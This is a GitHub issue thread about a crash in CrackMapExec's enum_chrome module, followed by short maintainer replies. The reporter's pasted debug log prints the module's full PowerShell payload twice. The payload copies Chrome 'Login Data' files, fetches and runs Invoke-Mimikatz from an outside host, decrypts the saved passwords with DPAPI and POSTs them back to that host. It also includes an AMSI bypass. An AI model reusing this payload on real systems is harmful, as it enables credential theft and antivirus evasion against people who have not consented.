Enum_Chrome Module Error

[redteamwynns-zz]

Here's an error I got when trying to execute the new enum_chrome module on a Windows 10 build. Did not verify remote host actually had chrome, it very well may not. KTHXBYE!

(CME) root@Drone:~# cme 10.10.10.154 -id 1 -M enum_chrome --verbose
08-12-2016 11:11:03 CME          10.10.10.154:445 [*] Windows 10.0 Build 14393 (name:NAME) (domain:DOMAIN)
08-12-2016 11:11:03 CME          10.10.10.154:445 [+] DOMAIN\User (Pwn3d!)
08-12-2016 11:11:03 DEBUG                                          Payload: 
        $cmd = "privilege::debug sekurlsa::dpapi"
        $userdirs = get-childitem "$Env:SystemDrive\Users"
        foreach ($dir in $userdirs) {
            $LoginDataPath = "$Env:SystemDrive\Users\$dir\AppData\Local\Google\Chrome\User Data\Default\Login Data"

            if ([System.IO.File]::Exists($LoginDataPath)) {
                $rand_name = -join ((65..90) + (97..122) | Get-Random -Count 7 | % {[char]$_})
                $temp_path = "$Env:windir\Temp\$rand_name"
                Copy-Item $LoginDataPath $temp_path
                $cmd = $cmd + " `"dpapi::chrome /in:$temp_path`""
            }

        }
        $cmd = $cmd + " exit"

        IEX (New-Object Net.WebClient).DownloadString('https://10.10.10.96:443/Invoke-Mimikatz.ps1');
        $creds = Invoke-TJWNoSQnDv -Command $cmd;
        $request = [System.Net.WebRequest]::Create('https://10.10.10.96:443/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
        $request.ContentLength = $bytes.Length;
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
        $request.GetResponse();
08-12-2016 11:11:03 DEBUG                                          Unincoded command:
[Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
try{ 
[Ref].Assembly.GetType('System.Management.Automation.AmsiUtils').GetField('amsiInitFailed', 'NonPublic,Static').SetValue($null, $true)
}catch{}

        $cmd = "privilege::debug sekurlsa::dpapi"
        $userdirs = get-childitem "$Env:SystemDrive\Users"
        foreach ($dir in $userdirs) {
            $LoginDataPath = "$Env:SystemDrive\Users\$dir\AppData\Local\Google\Chrome\User Data\Default\Login Data"

            if ([System.IO.File]::Exists($LoginDataPath)) {
                $rand_name = -join ((65..90) + (97..122) | Get-Random -Count 7 | % {[char]$_})
                $temp_path = "$Env:windir\Temp\$rand_name"
                Copy-Item $LoginDataPath $temp_path
                $cmd = $cmd + " `"dpapi::chrome /in:$temp_path`""
            }

        }
        $cmd = $cmd + " exit"

        IEX (New-Object Net.WebClient).DownloadString('https://10.10.10.96:443/Invoke-Mimikatz.ps1');
        $creds = Invoke-TJWNoSQnDv -Command $cmd;
        $request = [System.Net.WebRequest]::Create('https://10.10.10.96:443/');
        $request.Method = 'POST';
        $request.ContentType = 'application/x-www-form-urlencoded';
        $bytes = [System.Text.Encoding]::ASCII.GetBytes($creds);
        $request.ContentLength = $bytes.Length;
        $requestStream = $request.GetRequestStream();
        $requestStream.Write( $bytes, 0, $bytes.Length );
        $requestStream.Close();
        $request.GetResponse();

08-12-2016 11:11:03 DEBUG                                          Executed command via atexec
08-12-2016 11:11:03 ENUM_CHROME  10.10.10.154:445          [+] Executed payload
08-12-2016 11:11:03 ENUM_CHROME                                    [*] Waiting on 1 host(s)
08-12-2016 11:11:04 ENUM_CHROME  10.10.10.154                      [*] - - "GET /Invoke-Mimikatz.ps1 HTTP/1.1" 200 -
08-12-2016 11:11:08 ENUM_CHROME  10.10.10.154                      [*] - - "POST / HTTP/1.1" 200 -
----------------------------------------
Exception happened during processing of request from ('10.10.10.154', 50127)
Traceback (most recent call last):
  File "/usr/lib/python2.7/SocketServer.py", line 290, in _handle_request_noblock
    self.process_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 318, in process_request
    self.finish_request(request, client_address)
  File "/usr/lib/python2.7/SocketServer.py", line 331, in finish_request
    self.RequestHandlerClass(request, client_address, self)
  File "/usr/lib/python2.7/SocketServer.py", line 652, in __init__
    self.handle()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 340, in handle
    self.handle_one_request()
  File "/usr/lib/python2.7/BaseHTTPServer.py", line 328, in handle_one_request
    method()
  File "/root/.virtualenvs/CME/local/lib/python2.7/site-packages/cme/cmeserver.py", line 29, in do_POST
    self.server.module.on_response(self.server.context, self)
  File "/root/.virtualenvs/CME/local/lib/python2.7/site-packages/cme/modules/enum_chrome.py", line 108, in on_response
    passw = buf[i+3].split(':', 1)[1].strip()
IndexError: list index out of range
----------------------------------------
08-12-2016 11:11:19 [*] KTHXBYE!

[byt3bl33d3r]

Adding the dafuq label cause why not

[byt3bl33d3r]

Fixed in the newest version which will be released Friday

[byt3bl33d3r]

Whoops, didn't mean to close.

[byt3bl33d3r]

@redteamwynns should be fixed in latest version